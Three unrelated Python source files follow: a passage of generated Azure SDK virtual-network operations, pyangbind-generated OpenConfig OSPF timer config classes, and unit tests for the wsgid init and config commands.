'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualNetwork"]
"""Updates a virtual network tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param parameters: Parameters supplied to update virtual network tags.
:type parameters: ~azure.mgmt.network.v2019_06_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualNetwork or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_06_01.models.VirtualNetwork]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualNetworkListResult"]
"""Gets all virtual networks in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualNetworkListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_06_01.models.VirtualNetworkListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualNetworkListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualNetworks'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualNetworkListResult"]
"""Gets all virtual networks in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualNetworkListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_06_01.models.VirtualNetworkListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualNetworkListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks'} # type: ignore
def check_ip_address_availability(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
ip_address, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.IPAddressAvailabilityResult"
"""Checks whether a private IP address is available for use.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param ip_address: The private IP address to be verified.
:type ip_address: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IPAddressAvailabilityResult, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_06_01.models.IPAddressAvailabilityResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IPAddressAvailabilityResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
# Construct URL
url = self.check_ip_address_availability.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['ipAddress'] = self._serialize.query("ip_address", ip_address, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('IPAddressAvailabilityResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_ip_address_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/CheckIPAddressAvailability'} # type: ignore
def list_usage(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualNetworkListUsageResult"]
"""Lists usage stats.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualNetworkListUsageResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_06_01.models.VirtualNetworkListUsageResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkListUsageResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_usage.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualNetworkListUsageResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_usage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/usages'} # type: ignore
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/global/timers/lsa-generation/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to the generation of
LSAs by the local system
"""
__slots__ = ("_path_helper", "_extmethods", "__initial_delay", "__maximum_delay")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"global",
"timers",
"lsa-generation",
"config",
]
def _get_initial_delay(self):
"""
Getter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
return self.__initial_delay
def _set_initial_delay(self, v, load=False):
"""
Setter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_initial_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_initial_delay() directly.
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """initial_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="initial-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__initial_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_initial_delay(self):
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
def _get_maximum_delay(self):
"""
Getter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
return self.__maximum_delay
def _set_maximum_delay(self, v, load=False):
"""
Setter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_maximum_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maximum_delay() directly.
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """maximum_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="maximum-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__maximum_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_maximum_delay(self):
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
initial_delay = __builtin__.property(_get_initial_delay, _set_initial_delay)
maximum_delay = __builtin__.property(_get_maximum_delay, _set_maximum_delay)
_pyangbind_elements = OrderedDict(
[("initial_delay", initial_delay), ("maximum_delay", maximum_delay)]
)
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/global/timers/lsa-generation/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to the generation of
LSAs by the local system
"""
__slots__ = ("_path_helper", "_extmethods", "__initial_delay", "__maximum_delay")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"global",
"timers",
"lsa-generation",
"config",
]
def _get_initial_delay(self):
"""
Getter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
return self.__initial_delay
def _set_initial_delay(self, v, load=False):
"""
Setter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_initial_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_initial_delay() directly.
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """initial_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="initial-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__initial_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_initial_delay(self):
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
def _get_maximum_delay(self):
"""
Getter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
return self.__maximum_delay
def _set_maximum_delay(self, v, load=False):
"""
Setter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_maximum_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maximum_delay() directly.
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """maximum_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="maximum-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__maximum_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_maximum_delay(self):
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
initial_delay = __builtin__.property(_get_initial_delay, _set_initial_delay)
maximum_delay = __builtin__.property(_get_maximum_delay, _set_maximum_delay)
_pyangbind_elements = OrderedDict(
[("initial_delay", initial_delay), ("maximum_delay", maximum_delay)]
)
|
|
import unittest
from wsgid.commands import *
from wsgid.test import FakeOptions, fullpath
import os
import simplejson
from mock import patch, Mock
import signal
ROOT_PATH = fullpath(__file__)
FIXTURES_PATH = os.path.join(ROOT_PATH, 'fixtures')
APP_PATH = os.path.join(FIXTURES_PATH, "newapp")
#Generates a fresh full path for the given app_name
def new_app_path(app_name):
return os.path.join(FIXTURES_PATH, app_name)
class CommandInitTest(unittest.TestCase):
def setUp(self):
self.init = CommandInit()
self.opt = FakeOptions(app_path=APP_PATH)
'''
If the the --app-path does not exist, create.
'''
@patch('sys.stderr')
def test_create_root_folter_if_not_exists(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(APP_PATH), "Did not create the app root folder")
@patch('sys.stderr')
def test_create_pid_structure(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid")), "Did not create pid folder")
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/master")), "Did not create master pid folder")
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/worker")), "Did not create workers pid folder")
@patch('sys.stderr')
def test_create_log_dir(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "logs")), "Did not create logs folder")
@patch('sys.stderr')
def test_create_app_dir(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "app")), "Did not create app folder")
@patch('sys.stderr')
def test_create_plugins_dir(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "plugins")), "Did not create app folder")
'''
Checks there is no problem if we run "init" on an already
inited path
'''
@patch('sys.stderr')
def test_init_an_already_inited_path(self, *args):
self.init.run(FakeOptions(app_path=APP_PATH))
os.system("rm -rf {0}".format(os.path.join(APP_PATH, 'pid')))
self.init.run(FakeOptions(app_path=APP_PATH))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "app")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "logs")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/master")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/worker")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "plugins")), "plugins dir should exist")
class CommandConfigTest(unittest.TestCase):
@patch('sys.stderr')
def setUp(self, *args):
self.config = CommandConfig()
self.init = CommandInit()
self.CLEAN_PATH = os.path.join(FIXTURES_PATH, 'clean-path')
self.opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp://127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var',
django=False)
self.init.run(self.opt)
'''
if ${app-path}/wsgid.json does not exists, create
'''
def test_create_json_if_not_exist(self):
self.config.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(self.CLEAN_PATH, "wsgid.json")))
'''
An option passed on the command line, overrides the same option in the
config file.
'''
def test_override_option(self):
# Write an config file so we can override some options
f = file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "w+")
simplejson.dump({"recv": "tcp://127.0.0.1:3000", "debug": "True", "workers": 8, "chroot": "True"}, f)
f.close()
# Here we override some options
self.opt.recv ="tcp://127.0.0.1:4000"
self.opt.workers = 8
self.opt.chroot = None
# Run the config command
self.config.run(self.opt)
# Check that the options passed on the command line are the new config options
h = simplejson.loads(file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "r+").read())
self.assertEquals("tcp://127.0.0.1:4000", h['recv'])
self.assertEquals("True", h['debug'])
self.assertEquals(8, h['workers'])
